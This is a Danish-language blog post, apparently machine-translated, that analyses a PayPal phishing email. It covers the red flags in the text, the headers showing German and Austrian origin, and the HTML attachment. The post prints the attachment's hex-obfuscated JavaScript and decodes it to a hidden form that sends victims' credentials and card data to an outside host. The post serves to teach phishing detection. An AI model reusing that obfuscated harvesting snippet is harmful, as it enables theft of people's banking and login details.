10Sep
I dagens verden, hvor alles information er online, er phishing et af de mest populære og ødelæggende onlineangreb, fordi du altid kan rense en virus, men hvis dine bankoplysninger stjæles, har du problemer. Her er en sammenfatning af et sådant angreb, vi modtog.
Tror ikke, at det kun er dine bankoplysninger, der er vigtige: Hvis nogen får kontrol over din konto login, kender de ikke kun de oplysninger, der er indeholdt i den pågældende konto, men oddsene er, at samme loginoplysninger kan bruges på forskelligeandre konti. Og hvis de kompromitterer din e-mail-konto, kan de nulstille alle dine andre adgangskoder.
Så udover at holde stærke og varierende adgangskoder, skal du altid være på udkig efter falske e-mails, der er maskerende som den rigtige ting. Mens de fleste phishing-forsøg er amatørlige, er nogle ret overbevisende, så det er vigtigt at forstå, hvordan man genkender dem på overfladeniveau, og hvordan de arbejder under emhætten.
Billede af asirap
Undersøgelse Hvad er der i plain sight
Vores eksempel email, ligesom de fleste phishing-forsøg, "meddeler" dig om aktivitet på din PayPal-konto, som under normale omstændigheder ville være alarmerende. Så opfordringen til handling er at verificere / gendanne din konto ved at indsende stort set alle personlige oplysninger, du kan tænke på.Igen er dette ret formel.
Selvom der helt sikkert er undtagelser, er stort set alle phishing og scam-e-mails fyldt med røde flag direkte i meddelelsen selv. Selvom teksten er overbevisende, kan du som regel finde mange fejl i hele meddelelsesorganet, hvilket indikerer, at meddelelsen ikke er legitim.
Beskedlegemet
Ved første øjekast er dette et af de bedre phishing-e-mails, jeg har set. Der er ingen stavemåder eller grammatiske fejl, og verbiage læser alt efter hvad man forventer. Der er dog et par røde flag, du kan se, når du undersøger indholdet lidt nærmere.
- "Paypal" - Det korrekte tilfælde er "PayPal"( kapital P).Du kan se begge variationer bruges i meddelelsen. Virksomhederne er meget bevidste med deres branding, så det er tvivlsomt, at noget sådant ville passere korrekturprocessen.
- "Tillad ActiveX" - Hvor mange gange har du set en legitim web-baseret virksomhed, størrelsen af Paypal bruger en proprietær komponent, som kun fungerer på en enkelt browser, især når de understøtter flere browsere? Sikker på, et sted derude gør noget selskab, men det er et rødt flag.
- "sikkert." - Bemærk hvordan dette ord ikke rækker i margen med resten af afsnitsteksten. Selvom jeg strækker vinduet lidt mere, pakkes det ikke eller rummen korrekt.
- "Paypal!" - Rummet inden udråbstegn ser utilsigtet ud. Bare en anden quirk, som jeg er sikker på, ikke ville være i en legitim email.
- "PayPal-kontoopdateringsformular.pdf.htm" - Hvorfor skulle Paypal vedhæfte en "PDF", især når de bare kunne linke til en side på deres websted? Desuden, hvorfor ville de forsøge at forkæle en HTML-fil som PDF?Dette er det største røde flag for dem alle.
Meddelelsesoverskriften
Når du kigger på meddelelsesoverskriften, vises et par flere røde flag:
- Den fra adressen er [email protected].
- Til adressen mangler. Jeg har ikke blankt dette ud, det er simpelthen ikke en del af standardmeddelelsesoverskriften. Et firma, der har dit navn, vil typisk tilpasse e-mailen til dig.
Vedhæftet fil
Når jeg åbner vedhæftet fil, kan du straks se, at layoutet ikke er korrekt, da det mangler stiloplysninger. Igen, hvorfor ville PayPal e-maile en HTML-formular, da de bare kunne give dig et link på deres websted?
Bemærk: vi brugte Gmails indbyggede HTML-vedhæftningsviser til dette, men vi anbefaler, at du IKKE ÅBNE vedhæftede filer fra svindlere. Aldrig. Nogensinde. De indeholder meget ofte udbytter, der installerer trojanere på din pc for at stjæle din kontooplysninger.
Scrolling lidt mere, du kan se, at denne formular ikke blot spørger om vores PayPal loginoplysninger, men også for bank- og kreditkortoplysninger. Nogle af billederne er brudt.
Det er indlysende, at dette phishing-forsøg går efter alt med ét slag.
Den tekniske opdeling
Selv om det skal være ret klart, baseret på, hvad der er klart, at dette er et phishing-forsøg, vil vi nu bryde ned den tekniske sminke af e-mailen og se, hvad vi kan finde.
Information fra vedhæftet fil
Den første ting at kigge på er HTML-kilden til vedhæftningsformularen, hvilket er hvad der indsender dataene til det falske sted.
Når du hurtigt ser kilden, vises alle links gyldige, da de peger på enten "paypal.com" eller "paypalobjects.com", som begge er legitime.
Nu skal vi se på nogle grundlæggende sideoplysninger, som Firefox samler på siden.
Som du kan se, bliver nogle af grafikerne trukket fra domænerne "blessedtobe.com", "goodhealthpharmacy.com" og "pic-upload.de" i stedet for de legitime PayPal-domæner.
Information fra e-mail-overskrifterne
Næste vil vi se på de raske email-meddelelsesoverskrifter. Gmail gør det tilgængeligt via menuen Vis originalmenu på meddelelsen.
Hvis du ser på overskriftsoplysningerne for den oprindelige meddelelse, kan du se, at denne meddelelse blev komponeret ved hjælp af Outlook Express 6. Jeg tvivler på, at PayPal har nogen på personale, som sender hver af disse meddelelser manuelt via en forældet e-mail-klient.
Nu ser vi på routingsoplysningerne, vi kan se IP-adressen til både afsenderen og relaying mailserveren.
"Bruger" IP-adressen er den oprindelige afsender. Hvis du hurtigt kigger på IP-informationen, kan vi se, at afsendelses-IP'en er i Tyskland.
Og når vi ser på relaying mail serverens( mail.itak.at), kan IP-adressen vi se dette være en internetudbyder baseret i Østrig. Jeg tvivler på, at PayPal ruter deres e-mails direkte via en Østrig-baseret internetudbyder, når de har en massiv servergård, der nemt kunne håndtere denne opgave.
Hvor går dataene?
Så vi har klart fastslået, at dette er en phishing-email og samlet nogle oplysninger om, hvor meddelelsen stammer fra, men hvad med, hvor dine data er sendt?
For at se dette skal vi først gemme HTM vedhæftet fil gøre vores skrivebord og åbne i et tekstredigeringsprogram. Rulning gennem det ser alt ud til at være i orden, undtagen når vi kommer til en mistænkelig udseende Javascript-blok.
Udbrud af den fulde kilde til den sidste blok af Javascript, vi ser:
& lt; script language = "JavaScript" type = "text / javascript" & gt;
// Copyright © 2005 Voormedia - WWW.VOORMEDIA.COM
var i, y, x =”3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f7777772e646578706f737572652e6e65742f6262732f646174612f7665726966792e706870223e”; y =”; for( i = 0; i & lt; x.length; i + = 2){ y + = unescape( '%' + x.substr( i, 2));} document.write( y);
& lt; / script & gt;
Hver gang du ser en stor jumbled streng af tilsyneladende tilfældige bogstaver og tal indlejret i en Javascript-blok, er det normalt noget mistænkeligt. Ser man på koden, er variablen "x" sat til denne store streng og afkodes derefter til variablen "y".Det endelige resultat af variabel "y" skrives derefter til dokumentet som HTML.
Da den store streng er lavet af tallene 0-9 og bogstaverne AF, er det mest sandsynligt kodet via et simpelt ASCII til hex konvertering:
3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f7777772e646578706f737572652e6e65742f6262732f646174612f7665726966792e706870223e
oversættes til:
& lt; formen name =”main” id =”main”metode = "post" action = "http: //www.dexposure.net/bbs/data/ verify.php" & gt;
Det er ikke tilfældigt, at dette afkodes til en gyldig HTML-formular, som sender resultaterne ikke til PayPal, men til et skurksted.
Når du også ser HTML-kilden til formularen, vil du se, at denne formular tag ikke er synlig, fordi den genereres dynamisk via Javascript. Dette er en smart måde at skjule, hvad HTML'en rent faktisk gør, hvis nogen simpelthen skal se den genererede kilde til vedhæftet fil( som vi gjorde tidligere) i modsætning til at åbne vedhæftet fil direkte i et tekstredigeringsprogram.
Hvis du kører en hurtig whois på det fornærmende websted, kan vi se, at dette er et domæne hostet hos en populær webhost, 1and1.
Hvad der skiller sig ud er, at domænet bruger et læsbart navn( i modsætning til noget som "dfh3sjhskjhw.net") og domænet er registreret i 4 år. På grund af dette tror jeg, at dette domæne blev kapret og brugt som en bonde i dette phishing-forsøg.
Cynicism er et godt forsvar
Når det kommer til at være sikker på nettet, gør det aldrig ondt at have en god cynisme.
Selvom jeg er sikker på, at der er flere røde flag i eksemplet e-mail, er det vi har påpeget ovenfor indikatorer, vi så efter blot et par minutters undersøgelse. Hypotetisk, hvis overfladeniveauet af e-mailen efterlignede sin legitime modpart 100%, ville den tekniske analyse stadig afsløre sin sande natur. Derfor importeres det for at kunne undersøge både hvad du kan og ikke kan se.
